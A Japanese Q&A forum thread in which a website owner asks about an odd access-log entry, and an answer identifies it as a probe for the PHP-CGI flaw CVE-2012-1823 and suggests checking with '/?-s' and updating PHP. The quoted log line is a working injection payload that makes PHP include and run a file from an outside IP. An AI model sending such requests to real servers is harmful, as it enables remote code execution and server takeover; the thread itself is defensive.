私が運営するWebサイト(www.example.comとします)に、以下のようなアクセスログが残っていました。
www.example.com/?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt
最後のIPアドレス「61.19.253.26」を調べると、タイ国のもののようですが、使用されていないようです。
これってサイバー攻撃の一種なのでしょうか?
何かしらの情報が盗まれたりした痕跡なのでしょうか?
自分で、ブラウザに上記URLを打ち込んだのですが、反応がありませんでした。
ちなみに、私のサイトはレンタルの共有サーバーで運用しています。
また、全てPHPで作成しており、ルートのindex.phpにパラメータを与えることで、全てのページを表示させるようにしています。
なお、index.phpとcssや画像以外は非公開ディレクトリに置いています。
また、同一契約で上記と同じ公開ディレクトリに複数のWebサイトを作っています。
盗まれたものは取り返せないので仕方がないのですが、危険な攻撃であればセキュリティを高める手段を講じる必要があると感じています。
上記アクセスで何が行われたのか、どのような危険があるのか、ご存じの方がいらっしゃいましたらご教授いただければ幸いです。
よろしくお願いいたします。
No.1ベストアンサー
- 回答日時:
「CVE-2012-1823」として報告されているPHPの脆弱性を利用した手口であり、
攻撃を試みた形跡であることは間違いありません。
ブラウザで
http://www.example.com/?-s
と打ち込んだ結果、PHPソースが表示されてしまうようなら脆弱性があります。
この脆弱性を利用するとサーバ上で好き勝手にコードが実行できるようになるため、
攻撃者が情報を盗んだり、サーバーを乗っ取ったりしてしまう恐れがあります。
で、今回のアクセスログですが、echo.txtの中身がecho文1つのみのPHPコードでしたので、
「攻撃が成立するかどうかの小手調べ」が行われたと思われます。
似たようなログが他になければ、攻撃は失敗に終わったと考えて差し支えありません。
PHPのバージョンを最新のものに上げておけばとりあえずは安心かと思います。
この脆弱性の詳細については
http://blog.tokumaru.org/2012/05/php-cgi-remote- …
http://www.atmarkit.co.jp/news/201205/10/php543. …
などをご覧ください。
詳しいご回答&ご解説ありがとうございました。
/?-sでアクセスしたところ、ソースは表示されず、画面も遷移しませんでした。
同様のアクセスはこの数日の間に2回だけでしたので、ひとまず安心しました。(接続IPは異なりました)
レンタルサーバなのでPHPのバージョンは変更できませんが、大手なのでおそらく大丈夫だと思います。
ありがとうございました。
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- その他(インターネット接続・インフラ) ブラウザにIPアドレス入力した時 1 2022/06/16 19:08
- MySQL PHPとMySQLを使った掲示板の作り方 1 2022/06/02 13:00
- 戦争・テロ・デモ サイバー攻撃の8割は中国から発言 皆様のご意見をお聞かせください。 8 2022/10/07 12:55
- ハッキング・フィッシング詐欺 webサイトでIPアドレスを抜く方法を聞きたいです。 1 2022/06/09 17:33
- その他(プログラミング・Web制作) このWEB用語、WEB文章、意味が分かりますか? 理解できない人が多いようなんですが・・・ 7 2022/10/22 09:13
- HTML・CSS Dreamweaver のテンプレートでの相対パスの設定について 2 2023/06/13 17:28
- その他(IT・Webサービス) WEBサイト内のファイルを探す方法は? 1 2022/11/11 16:38
- サーバー メールサーバーについて詳しい方、メールサーバーの管理業務経験のある方、教えてください。 3 2022/11/12 18:24
- ネットワーク cutestat.comというサイトでipアドレスが確認できる件 1 2022/04/10 14:19
- その他(プログラミング・Web制作) .htaccessファイルの修正がこれで問題ないかどうか 1 2022/04/21 08:42
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
車がスズメバチに攻撃されて困...
-
女性は何かを攻撃し続けないと...
-
「どいて!!」という言葉って...
-
スマブラでスマッシュホールド...
-
「けっせん!スペクター」のク...
-
適応機制と対処機制と防衛機制...
-
間接攻撃とは、具体的にどうい...
-
みなさんはおどおどしている人...
-
CAPCON VS SNK2 ファイネストKO...
-
これってサイバー攻撃でしょうか?
-
PSPモンハン2nd シェンガオレ...
-
HP,MP以外のゲージ
-
カラスはなぜきゅうりを食べるのか
-
マインクラフトをしていたんで...
-
RPGで「装備している状態」がE...
-
なぜモンハンはPS Vitaで続編を...
-
至急!単位について
-
ゲーム『ライフアフター』で「...
-
ファイナルファンタジー12で...
-
PSP版テイルズオブエターニア
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
カラスはなぜきゅうりを食べるのか
-
「どいて!!」という言葉って...
-
みなさんはおどおどしている人...
-
ジオニック フロントについて
-
DVDやBluRayなら電磁パルス攻撃...
-
ドラクエ11でセニカがもってい...
-
車がスズメバチに攻撃されて困...
-
可愛がっている飼い犬に噛まれ...
-
第五人格やDBDでよく聞くケバブ...
-
間接攻撃とは、具体的にどうい...
-
自己正当化に忙しく人を攻撃す...
-
FF12 遠隔攻撃はいずこ?
-
CAPCON VS SNK2 ファイネストKO...
-
こちらを昨日から使ってますが ...
-
「けっせん!スペクター」のク...
-
PS2鉄拳5のDEVIL WI...
-
無双3猛将軍伝の馬上チャージ...
-
嫌いな人間に対して、自分の周...
-
オッパい攻撃とキス攻撃どっち...
-
トワイライトプリンセス森の聖...
おすすめ情報